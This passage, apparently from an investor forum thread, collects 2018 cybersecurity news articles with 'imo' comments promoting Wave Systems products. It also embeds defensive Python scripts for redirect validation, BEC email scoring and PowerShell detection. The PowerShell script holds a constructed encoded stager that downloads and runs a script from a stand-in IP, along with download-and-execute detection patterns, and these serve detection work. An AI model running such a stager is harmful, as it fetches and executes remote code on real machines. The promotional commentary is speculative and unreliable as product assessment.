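        return False
    port_part = f":{port}" if port not in (None, 443) else ""
    normalized = f"https://{parts.hostname}{port_part}{parts.path}"
    return normalized in REGISTERED_REDIRECTS


def issue_token_redirect(redirect_uri, token, validator):
    """Where the login system would send the freshly minted token: only to a
    validated destination; otherwise return None and hand out nothing."""
    if not validator(redirect_uri):
        return None
    return f"{redirect_uri}#access_token={token}"


if __name__ == "__main__":
    # Constructed zone: one alias points at a cloud host that was decommissioned.
    records = {
        "www.example.com": "web-frontend.cloudapps.example",
        "success.example.com": "old-campaign.cloudapps.example",
    }
    live_targets = {"web-frontend.cloudapps.example"}
    print(find_dangling_cnames(records, live_targets.__contains__))  # ['success.example.com']
    taken_over = "https://success.example.com/collect"
    print(redirect_allowed_wildcard(taken_over), redirect_allowed_strict(taken_over))  # True False
```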
Upcoming Bill Would Lock Down Agencies' Internet-Connected Devices
https://www.nextgov.com/cybersecurity/2018/12/upcoming-bill-would-lock-down-agencies-internet-connected-devices/153304/
But agency chief information officers could make exceptions, according to the legislation.
A House lawmaker wants federal agencies to prioritize cybersecurity when buying internet-connected devices.
The Internet of Things Federal Cybersecurity Improvement Act, which Rep. Robin Kelly, D-Ill., plans to introduce next week, would require all internet-connected devices purchased by the government to meet a set of basic cybersecurity standards. The bill would also pressure agencies to avoid using so-called "lowest price technically acceptable" criteria when choosing vendors for those devices.
Under the legislation, the government could only buy devices that accept security patches and allow users to change passwords. Vendors would also need to notify agencies of any security vulnerabilities they discover and issue software updates as new threats arise.
“Everything from our national security to the personal information of American citizens could be vulnerable because of security holes in these devices,” Kelly said in an email to Nextgov. “As these devices positively revolutionize communication, we cannot allow them to become a backdoor to hackers or tools for cyberattacks.”
Under the bill, the Office of Management and Budget director would work with the General Services administrator, the secretaries of Defense, Commerce and Homeland Security, and leaders from the intelligence and national security communities to guarantee those standards and any others they deem necessary are included in federal contracts. They’d have 180 days to do so.
The Homeland Security secretary and OMB director would also have 180 days to create a database of non-compliant devices and list others that no longer receive security updates.
The legislation serves as the House counterpart to the Internet of Things Cybersecurity Improvement Act, which Sen. Mark Warner, D-Va., introduced last year.
While the bills share much of the same language, Kelly’s version would give agency chief information officers more authority to waive device requirements in certain circumstances.
Her bill also explicitly requires the OMB director and GSA administrator to guide agencies in limiting the use of lowest price technically acceptable criteria when selecting device vendors. Doing so would give the government more leeway to buy from companies that place a high value on security, which could incentivize others to adopt stricter standards for their own tech.
The idea is that paying more for security upfront would save agencies money in the long run.
The bill "leverages federal purchasing power to create pro-security market pressure and … serves as a model for the implementation of similar standards elsewhere," said Harvard University law and computer science professor Jonathan Zittrain.
Kelly released a draft of the bill in August 2017 and updated the legislation to reflect feedback from OMB, security advocates and the tech industry, she said. The original version, for instance, would have created an advisory board to explore effective standards for the internet of things, but that measure was cut from the final text.
“My goal was to create the best possible legislation to harden government-purchased and used [internet of things] devices,” she said. “We have made significant changes in order to build support and ensure a definition appropriate for the ever-evolving world of [the internet of things].”
=================================================================
Existing TPM-based computers should be required to be activated to protect these devices, and this could provide feedback for the IoT devices that would be 'hardened'. imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Australia passes world's first law authorizing encryption backdoors
https://www.cyberscoop.com/australia-encryption-backdoors-law-passes/
Australia’s Parliament on Thursday passed the world’s first law requiring technology companies to give law enforcement officials access to encrypted messages and communications.
The law authorizes police to compel companies to create a security vulnerability, often called a backdoor, that would give investigators access to an individual’s communication without that person’s knowledge. It marks a major milestone in the so-called “crypto wars” over the public’s ability to “go dark” via the powerful encryption available on commercial devices.
Authorities in Australia, the U.S. and the U.K. have argued for years that such access is necessary to help police get past the encryption in modern technology, which shields suspects from traditional interception techniques. Privacy advocates, technologists and businesses including Apple have criticized the Australian bill and similar proposals elsewhere, saying such plans would open doors for government abuse and malicious hackers alike.
Companies that fail to obey the law risk being fined.
“This ensures that our national security and law enforcement agencies have the modern tools they need, with appropriate authority and oversight, to access the encrypted conversations of those who seek to do us harm,” said Christian Porter, Australia’s attorney general.
International officials who have pushed for their own measures now will watch the next phase of the “going dark” debate unfold in Australia.
“Once you’ve built the tools, it becomes very hard to argue that you can’t hand them over to the U.S. government, the U.K. – it becomes something they can all use,” Lizzie O’Shea, a human rights lawyer, told the New York Times this week.
O’Shea previously wrote in a Times editorial that other nations in the Five Eyes intelligence-sharing alliance — made up of Australia, Britain, Canada, New Zealand and the U.S. — have pushed for Australia to “lead the charge” in finding a way to crack encrypted data. The country does not have a bill of rights, making it “a logical place to test new strategies” for breaching apps like WhatsApp and Signal.
“The truth is that there is simply no way to create tools to undermine encryption without jeopardizing digital security and eroding individual rights and freedoms,” she wrote. “Hackers with bad intentions will do their utmost to take advantage of any such tools that companies are forced to provide the government.”
=================================================================
The TPM is considerably better than software alone at protecting a client's computer. This law should give organizations/users even more reason to activate this amazing piece of hardware in their computers. For without the activation, the user is depending on software to protect his/her computer.
Wave's ERAS is a product that could help the TPM be activated en masse. Because of this new law Scrambls and/or Chadder could be worth a new look. imo.
U.S. Readies Charges Against Chinese Hackers
https://www.wsj.com/articles/u-s-readies-charges-against-chinese-hackers-1544206196
Government-linked hackers allegedly engaged in a multiyear scheme to break into U.S. technology service providers
-see link for article
================================================================
Will the U.S. or China activate their TPMs first en masse or do it simultaneously? It appears that one country could have a distinct defensive advantage over another by activating their TPMs first! See Wave ERAS below for one of those advantages!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Windows 10 Security Questions Prove Easy for Attackers to Exploit
https://www.darkreading.com/endpoint/windows-10-security-questions-prove-easy-for-attackers-to-exploit/d/d-id/1333404
New research shows how attackers can abuse security questions in Windows 10 to maintain domain privileges.
Attackers targeting Windows are typically after domain admin privileges. Once they have those privileges, researchers say, the security questions feature built into Windows can help them hold on to them.
In a presentation at this week's Black Hat Europe, security researchers from Illusive Networks demonstrated a new method for maintaining domain persistence by exploiting Windows 10 security questions. Despite good intentions, the feature, introduced in April, has the potential to turn into a durable, low-profile backdoor for attackers who know how to exploit it.
Windows admins are prompted to set up security questions as part of the Windows 10 account setup process. Tom Sela, head of security research at Illusive Networks, said the addition reflects a broader effort by Microsoft to build security into Windows 10. However, it also shows the delicate balance companies must strike in maintaining usability while improving protection.
"I think Microsoft also wants to introduce new usability features," Sela explained in an interview with Dark Reading. "There is a fine line with advancing security but also adding new usability features that may compromise security."
Magal Baz, security researcher at Illusive Networks, said the questions are more of a usability feature, designed for convenience, than a security mechanism. Today, if you forget your Windows login password, you're locked out of your machine and have to reinstall the operating system to regain access, he said. The questions feature lets users log back into their accounts by providing the name of their first pet, for example, in lieu of their password.
"Now in terms of security ... I don't think that it is well-protected," he explained. Because those questions and answers have the same power as a password, you'd think they would be as secure. However, unlike passwords, answers to security questions are not long and complex, they don't expire, and most of the time they don't change. "All the limitations that make passwords safer are not applied on the security questions," Baz pointed out.
In addition to having answers that can be found on social networks, the security questions "are not monitored. There are no policies around it – it's just there," he continued. "It allows you to regain access to the local administrative account." There's a reason why companies including Facebook and Google have stopped using security questions to secure accounts, Baz added.
Unlocking Admins' Answers
Before describing how this approach works, some context is needed. In recent years, attackers have sought not only domain access but a means of maintaining a reliable, low-profile presence on the domain. The process of becoming a domain admin has become much easier, Baz added. "A couple of years ago, it was thought this could take months ... it has shrunk into hours," he said.
To turn the questions feature into a backdoor, an attacker must first find a way to enable and edit security questions and answers remotely, without the need to execute code on the target machine. The attacker must also find a way to use preset Q&A to gain access to a machine while leaving as few traces as possible, Baz and Sela explained in their presentation.
Windows 10 security questions and answers are stored as LSA Secrets, where Windows keeps passwords and other secrets used for everyday operations. With administrative access to the registry, one can read and write LSA Secrets, and so change a user's security questions and answers, installing a backdoor for access to the same system in the future.
An attacker could remotely use this feature, for any and all of the Windows 10 machines in the domain, to control security questions and answers to be something he chooses, Baz said. The implications for someone abusing this without the account holder's knowledge are huge. Unlike passwords, which eventually expire and can be edited any time, security questions are static. The name of your first pet or mother's maiden name, for example, don't change, Baz pointed out.
Sela and Baz described use cases in which this tactic can be useful for an attacker. Someone could "spray" security questions across all Windows 10 machines and ensure a persistent hold in the network by ensuring everyone's dog is named Fluffy – and Fluffy is the name of everybody's birthplace, place where their parents met, model of their first car, etc.
What's more, security questions and answers aren't carefully protected. "The questions today are not monitored, are not changed. Probably most of IT admins are not even aware of their existence at the time being," Baz continued. "The implications ... for now [are] permanent access to all Windows 10 machines in the network quite easily and in low-profile manner."
The security questions also don't come with auditing capabilities, Sela added. "Even [for] IT administrators that would like to be aware of that, out of the box, Windows doesn't give them a way to monitor the status of those security questions."
Best Practices and Deleting Security Questions
Admins should constantly monitor security questions to make sure they are unique, or disable them by periodically changing them to random values, Baz and Sela said.
"Even before the question of security questions, it's a good practice to have as few local admins as possible on the network," Baz said.
Security admins don't feel good about the tool, the researchers said, noting how many people are looking for ways to get rid of it. As part of their presentation, Baz and Sela also shared an open-source tool they developed that can control or disable the security questions feature and mitigate the risk of questions being used as a backdoor into a Windows 10 machine.
=================================================================
Companies with Windows 10 computers may want to use Wave's Helpdesk-assisted PIN reset in Wave VSC 2.0 instead of the unreliable security questions method used by Windows 10. The article presents a very good case for using Wave's Helpdesk-assisted PIN reset. It's another good selling point for Wave VSC 2.0. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  ◦ Virtual Private Network (VPN)
  ◦ Local logon
  ◦ Remote logon
  ◦ Remote desktop access
  ◦ Intranet/Extranet
  ◦ Cloud applications
This phishing scam group built a list of 50,000 execs to target
https://www.zdnet.com/article/this-phishing-scam-group-built-a-list-of-50000-execs-to-target/
CEO fraud group has a big list of potential victims; just hope you aren't on it.
A group of online scammers has compiled a list of 50,000 executives, including CFOs and other finance chiefs, to use as targets for their schemes.
The list was discovered by security company Agari after the scammers unwisely targeted the company with one of its scams, prompting the company to investigate further.
The group - which Agari is calling London Blue - seems to specialise in business email compromise (BEC) scams. While there are many variations, the basic aim is to trick someone within an organisation - usually working in finance - to send funds to a bank account controlled by the crooks, thinking that the transfer is a request from someone senior inside their own organisation. Long before the mistake is discovered the funds have been moved or withdrawn.
The phishing emails sent by groups like this typically contain no malware, making them much harder for standard automated security measures to spot; many major security breaches now start with a phishing email. Also known as CEO fraud, these scams can be extremely lucrative for the crooks, devastating for the company hit, and very hard for police to tackle. The FBI puts the cost of these scams at somewhere around $12bn.
Agari's analysis shows how sophisticated these groups are becoming.
"London Blue operates like a modern corporation. Its members carry out specialized functions including business intelligence (lead generation), sales management (assignment of leads), email marketing (semi-customized BEC attack emails), sales (the con itself, conducted with individual attention to the victim), financial operations (receiving, moving and extracting the funds), and human resources (recruiting and managing money mules)," the company said.
The security company said it came across the list of execs as part of its research. The scammers had generated the list in early 2018 to be used in future BEC phishing campaigns. Of the names on the list, 71 percent were CFOs, two percent were executive assistants, and the remainder were other finance leaders. Several of the world's biggest banks each had dozens of executives listed, the company said. The group also singled out mortgage companies for special attention, which would enable scams that steal real estate purchases or lease payments. Over half of the 50,000 potential victim profiles that London Blue compiled in their targeting database were located in the US; other countries commonly targeted included Spain, the United Kingdom, Finland, the Netherlands and Mexico.
"In our analysis of London Blue, we identified the working methods of a group that has taken the basic technique of spear-phishing--using specific knowledge about a target's relationships to send a fraudulent email--and turned it into massive BEC campaigns," the company said. It said the group was likely based in Nigeria but also had members elsewhere including the US and UK.
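The article's point that these emails carry no malware is exactly why signature-based filters miss them: what is left to inspect is the header relationship between the display name, the sender address and the Reply-To, plus the language of the request. The script below is an added example (not Agari's tooling and not code from the article) of such header and body heuristics run over two constructed messages; the executive directory, the example.com domain, the keyword list and the weights are all assumptions chosen for the illustration.

```python
"""Header/body heuristics for malware-free BEC ("CEO fraud") mail.
Added illustration with constructed messages; not Agari's or anyone's product."""
import re
from email import message_from_string
from email.utils import parseaddr

# Hypothetical directory of executives worth protecting from display-name
# impersonation, keyed by lower-cased name (assumption for the example).
INTERNAL_DOMAIN = "example.com"
PROTECTED_EXECS = {
    "jane doe": "jane.doe@example.com",   # CFO
    "john roe": "john.roe@example.com",   # CEO
}
URGENCY = re.compile(
    r"\b(urgent|asap|immediately|wire|transfer|confidential|"
    r"before (?:close|end) of (?:business|day))\b", re.I)
WEIGHTS = {"display_name_impersonation": 4, "reply_to_mismatch": 3,
           "lookalike_domain": 3, "urgency_language": 1}
THRESHOLD = 4  # urgency alone never holds a message; a spoofed identity does


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, used to spot look-alike sender domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def body_text(msg) -> str:
    """Concatenate the text/plain parts of a message (single-part or multipart)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def score_message(raw: str) -> dict:
    """Return the BEC signals found in one RFC 5322 message and a hold decision."""
    msg = message_from_string(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_domain = from_addr.rsplit("@", 1)[-1].lower()
    signals = []
    known = PROTECTED_EXECS.get(from_name.strip().lower())
    if known and from_addr.lower() != known:          # exec's name, wrong mailbox
        signals.append("display_name_impersonation")
    if reply_addr and reply_addr.rsplit("@", 1)[-1].lower() != from_domain:
        signals.append("reply_to_mismatch")           # replies go somewhere else
    if from_domain != INTERNAL_DOMAIN and edit_distance(from_domain, INTERNAL_DOMAIN) <= 2:
        signals.append("lookalike_domain")            # e.g. examp1e.com
    if URGENCY.search(body_text(msg)):
        signals.append("urgency_language")
    score = sum(WEIGHTS[s] for s in signals)
    return {"from": from_addr, "signals": signals, "score": score,
            "hold_for_review": score >= THRESHOLD}


# Constructed samples: one CEO-fraud attempt, one ordinary internal request.
BEC_SAMPLE = """From: Jane Doe <jane.doe@examp1e.com>
Reply-To: Jane Doe <jdoe.cfo@freemail.example>
To: accounts.payable@example.com
Subject: Quick favour

I am in a meeting all day. Please wire the transfer to the new vendor
account before close of business, this is confidential.
"""
LEGIT_SAMPLE = """From: Jane Doe <jane.doe@example.com>
To: accounts.payable@example.com
Subject: Q3 close

Please send me the reconciled ledger when it is ready. Thanks.
"""

if __name__ == "__main__":
    for raw in (BEC_SAMPLE, LEGIT_SAMPLE):
        print(score_message(raw))
```

The weights are deliberately skewed so that a single identity signal (an executive's display name on a foreign mailbox) is enough to hold a message, while keyword matches alone only nudge the score; in production the directory would come from the HR system and the lookalike check would also cover registered brand domains.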
=================================================================
As I understand it, Chadder was built partly based on Scrambls. It would make sense for these 50,000 CFOs/CEOs to have Chadder to confirm a bank transfer as a secondary means of confirmation. imo. Then marketing Chadder to the rest of company employees could be an easier marketing proposition.
Quora discloses mega breach impacting 100 million users
https://www.zdnet.com/article/quora-discloses-mega-breach-impacting-100-million-users/
Account info, passwords, emails, private messages, and user votes were exposed
Quora, one of the largest question-and-answer portals on the Internet, said today that hackers gained access to its servers and stole information on approximately 100 million of its users, which represents almost half of the site's total userbase.
The company disclosed the breach today but said it discovered the hack last week, on Friday. Quora is still investigating the incident but said it already determined that hackers accessed the following types of user information:
• Account information (e.g., name, email address, encrypted password, data imported from linked networks when authorized by users)
• Public content and actions (e.g., questions, answers, comments, upvotes)
• Non-public content and actions (e.g., answer requests, downvotes, direct messages)
"The overwhelming majority of the content accessed was already public on Quora, but the compromise of account and other private information is serious," said Adam D'Angelo, Quora CEO.
"Questions and answers that were written anonymously are not affected by this breach as we do not store the identities of people who post anonymous content," he added.
"It is highly unlikely that this incident will result in identity theft, as we do not collect sensitive personal information like credit card or social security numbers," the company added later today in a help page regarding the incident.
The site has already taken steps to log out all Quora users who may have been affected. Users who used a password to secure their account have already had their password invalidated and will need to choose a new one the next time they log in.
Quora said it's in the process of notifying all users who it believes were impacted by the hack. The company said that not all users were affected and that "some were impacted more than others."
The tech site also said it already took steps to "contain the incident" and prevent future unauthorized access to its servers. The company said it's still looking into the cause of the breach together with a digital forensics firm. Quora also notified law enforcement.
This is the second hack of a major tech firm in the past week after Dell announced a similar breach of its Dell.com online accounts last week.
U.S. Financial Firms to Further Increase Cybersecurity Spending
https://www.bloomberg.com/news/articles/2018-12-03/u-s-financial-firms-to-further-increase-cybersecurity-spending
U.S. banks and other financial firms are projecting higher spending on cybersecurity as they face bigger threats and more attacks.
In a survey of 100 senior security officers, 84 percent said their firms are planning to spend more this year on cybersecurity, up from 78 percent a year ago, data-security provider Thales eSecurity said in a report to be released Tuesday. About 36 percent of companies said they experienced an intrusion in 2018, up from 24 percent in last year’s survey.
Some of the largest U.S. banks already have boosted cybersecurity spending to almost $1 billion a year following high-profile attacks at companies such as Equifax Inc. and Anthem Inc. Financial firms also have increased information-sharing and set up industrywide backup systems for client data to prevent financial-system disruptions during a major hack.
Some of the spending might not be on target. The vast majority of financial firms are still spending too much on defending personal computers despite awareness that’s the least effective strategy, the Thales survey found. More attention should be paid to network security, said Andy Kicklighter, director of product marketing at the firm.
“The emphasis needs to shift to protecting data,” he said in a phone interview. “Companies are afraid that data protection will disrupt their business, but that’s a concern of yesterday. There are a multitude of solutions today that won’t disrupt or slow down regular business while protecting the data.”
=================================================================
If Wave can sign up a Fortune Global 500 financial services company for its VSC 2.0 then certainly it could sign up a lot of financial firms to use VSC 2.0. This article shows that 84% are planning on spending more money on cybersecurity this year. Given the better security of VSC 2.0 and the weaknesses of its competitors the sales process should be rather quick for many. imo. Also, 36 percent of those companies that experienced an intrusion could change and only allow known and approved devices on their network via Wave's ERAS.
================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Lee, MA -
December 17, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announces a five-year master licensing agreement (MLA) with a leading global corporation (as determined by the 2015 Fortune Global 500 List) for its Virtual Smart Card 2.0 solution. This MLA sets the terms and pricing for licenses and maintenance across the customer’s global organization and establishes it as their preferred two-factor authentication solution. Instead of one large license purchase for the entire organization, each of the customer’s subordinate divisions will make separate orders in accordance with the terms of this MLA.
The first purchase of 2,000 VSC 2.0 licenses under this agreement, when added to a previous purchase, completes the requirement for the customer’s global IT division. That division will now lead the internal effort to standardize the remaining 150,000+ endpoints within their organization with the new Wave VSC 2.0 solution. While there are no minimum order requirements under the agreement, discussions for additional orders are underway.
“Our five-year agreement with this customer is the first very large scale contract for VSC 2.0 and is an important milestone for Wave,” said Bill Solms, President and CEO of Wave Systems. “This customer is a major global financial services company and their standards for protecting their systems from unauthorized access and the integrity of their data are of the highest order. Wave had to pass a very rigorous technical and business review to win the competition. We believe that this client’s decision to choose Wave Virtual Smart Card 2.0 over their incumbent solution gives us tremendous credibility in the two-factor authentication market. We will remain engaged with this company in order to complete the additional sales and deployments in the months ahead.”
Wave Virtual Smart Card 2.0 is a tokenless, hardware-based, two-factor authentication solution that offers superior security at less than half the cost of comparable solutions. It is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7, 8 and 10. It also provides management support for the Microsoft Virtual Smart Card on Windows 8 and 10. Wave’s VSC solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, significantly lower total cost of ownership, and a greatly reduced risk of unauthorized access.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure Passphrase and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with both TPM 1.2 and TPM 2.0 security chips
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
MITRE Changes the Game in Security Product Testing
https://www.darkreading.com/endpoint/mitre-changes-the-game-in-security-product-testing/d/d-id/1333374
Nonprofit has published its first-ever evaluation of popular endpoint security tools - measured against its ATT&CK model.
There were no grades, scores, or rankings, but today's official release by MITRE of the results from its tests of several major endpoint security products could signal a major shift in the testing arena.
MITRE, a nonprofit funded by the US federal government, in its inaugural commercial tests pitted each product against the well-documented attack methods and techniques used by the Chinese nation-state hacking group APT3, aka Gothic Panda, drawn from MITRE's widely touted - and open - ATT&CK model.
Endpoint detection and response (EDR) vendors Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA, and SentinelOne played blue team with their products against a red team of experts from MITRE. Unlike traditional third-party product testing in security, the ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) approach uses open standards, methods, and the vendors perform live defenses with their products.
The testing operates in a collaborative manner. "They invited the vendors in to help them drive the tool and show how they find [attacks]," says Mark Dufresne, vice president of research for Endgame. "MITRE was sitting right there, and the product wasn't just chucked over the wall" and tested like in many other third-party tests.
"It was a collaborative and conversational, versus transactional, model," he says.
MITRE tracks and documents how the tools are tuned and configured, and how they do or don't detect an offensive move by its "APT3" red team, for example. The results get published on MITRE's website for anyone to see and study.
"We really want this to be a collaborative process with the vendors; we want them to be part of the process," says Frank Duff, MITRE's lead engineer for the evaluations program. The goal is both to improve the products as well as share the evaluations publicly so organizations running those tools or shopping for them can get an in-depth look at their capabilities, according to Duff.
MITRE chose APT3's methods of attack, which include credential-harvesting and employing legitimate tools used by enterprises to mask their activity. Each step of the attack is documented, such as how the tool reacted to the attacker using PowerShell to mask privilege-escalation. ATT&CK is based on a repository of adversary tactics and techniques and is aimed at helping organizations find holes in their defenses. For security vendors, ATT&CK testing helps spot holes or weaknesses in their products against known attack methods.
The collaborative and open testing setup represents a departure from traditional third-party testing. Vendors and labs traditionally have had an uneasy and sometimes contentious relationship over control of the testing process and parameters. Longtime friction in the security product test space erupted into an ugly legal spat in September, when testing firm NSS Labs filed an antitrust lawsuit against cybersecurity vendors CrowdStrike, ESET, and Symantec, as well as the nonprofit Anti-Malware Testing Standards Organization (AMTSO), over a vendor-backed testing protocol.
The suit claims the three security vendors and AMTSO, of which they and other endpoint security vendors are members, unfairly allow their products to be tested only by organizations that comply with AMTSO's testing protocol standard.
"The whole testing landscape is a real mess," Endgame's Dufresne says. "[But] as a vendor, it's important to be there."
NSS Labs, which is a member of AMTSO, was one of a minority of members that voted against the standard earlier this year; the majority of members support it and plan to adopt it. "Our fundamental focus is if a product is good enough to sell, it's good enough to test. We shouldn't have to comply to a standard on what and how we can test," said Jason Brvenik, chief technology officer at NSS Labs, in an interview with Dark Reading after the suit was filed.
Traditional third-party tests, such as those conducted by NSS Labs, AV-Test, and AV-Comparatives, focus mainly on file-based malware, Endgame's Dufresne explains, looking at whether the security product blocks specific malware. "We do participate in those ... but they truly miss a huge swath of overall attacker activity."
MITRE's Duff says there are different security product tests for different purposes. ATT&CK is all about openness and providing context to the evaluation, he says. "All different testing services have their own purpose, value, and approaches. This is our approach, and we are hoping it resonates to the public."
Even so, malware-based testing isn't likely to go away. "I think some buyers like to see a number" like those tests provide, Endgame's Dufresne says.
Greg Sim, CEO of Glasswall Solutions, says third-party testing was overdue for a change. Even when they garner high scores from the antimalware testing labs, some products continue to fail in real-world attacks, he says. "I think there's going to be a different model," he says, noting that his firm has run tests with MITRE, which it considers an example of a reputable third party for testing.
Another security vendor executive who requested anonymity says MITRE's entry into the testing arena came just at the right time. "Emulating tradecraft of a known adversary, nation/state - for us on the vendor side, we’re saying, 'Hallelujah, they are doing it the right way,'" he says.
MITRE's new testing service represents new territory for the nonprofit, but that doesn't mean its federal government work will subside. Vendors pay a fee, which MITRE would not disclose. "MITRE historically has focused on doing testing of solutions for US government customers or sponsors. That role is not going anywhere," Duff notes.
MITRE hasn't yet set a timeframe for its next series of tests, he adds, but the team will pick another APT group to emulate.
"We are just trying to get at the ground truth on these tools," Duff says.
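The article describes the evaluation documenting, step by step, how each tool reacted to moves such as the attacker using PowerShell to mask privilege escalation. What that looks like on the blue-team side is detection logic over process-creation telemetry tagged with the ATT&CK technique it evidences. The script below is an added example (not MITRE's evaluation harness and not any vendor's product) run over three constructed Sysmon-style process-creation events; the technique IDs are those from the public ATT&CK knowledge base, while the events, paths and the 198.51.100.7 stager URL are invented for the illustration.

```python
"""Detection logic for PowerShell tradecraft over constructed process-creation
events, with findings mapped to ATT&CK technique IDs. Added illustration;
not MITRE's harness nor a vendor's detection engine."""
import base64
import re

# Flag spellings PowerShell accepts as unambiguous prefixes of the long form.
ENCODED = re.compile(r"-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{8,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass", re.I)
RUNAS = re.compile(r"-verb\s+runas", re.I)
DOWNLOAD_EXEC = re.compile(
    r"(iex|invoke-expression)\b.*(downloadstring|downloadfile|invoke-webrequest)", re.I | re.S)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Evaluate one process-creation event; alert when two or more findings coincide."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    findings = []
    if image not in ("powershell.exe", "pwsh.exe"):
        return {"findings": findings, "decoded": None, "alert": False}
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(("T1027", "base64-encoded PowerShell command"))
    if HIDDEN.search(cmd):
        findings.append(("T1564.003", "hidden window"))
    if BYPASS.search(cmd):
        findings.append(("T1059.001", "execution policy bypass"))
    if parent in OFFICE_PARENTS:
        findings.append(("T1059.001", f"PowerShell spawned by {parent}"))
    if RUNAS.search(decoded or cmd):
        findings.append(("T1548", "elevation requested via Start-Process -Verb RunAs"))
    if DOWNLOAD_EXEC.search(decoded or cmd):
        findings.append(("T1105", "download-and-execute of remote content"))
    return {"findings": findings, "decoded": decoded, "alert": len(findings) >= 2}


# Constructed samples. The stager is encoded at runtime exactly as an attacker
# would prepare a -EncodedCommand payload (UTF-16LE, then base64).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -Exec Bypass -Enc {ENC}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": 'powershell.exe -nop -w hidden -c "Start-Process cmd.exe -Verb RunAs"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(analyze(ev))
```

Requiring two coinciding findings before alerting is what keeps the benign inventory script quiet while still catching the two attacker-style launches; the decoded command is returned so an analyst sees the stager rather than a base64 blob.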
=================================================================
It seems that Wave was a first mover with the Wave Endpoint Monitor and it could get better results than its competitors in MITRE testing!
=================================================================
Wave Integrating MITRE’s Attestation Technique into its Endpoint Monitor for Remediating Advanced Malware
https://www.wavesys.com/buzz/pr/wave-integrating-mitre%E2%80%99s-attestation-technique-its-endpoint-monitor-remediating-advanced-mal
MITRE Details Technique at Black Hat 2013
Lee, MA -
July 31, 2013 -
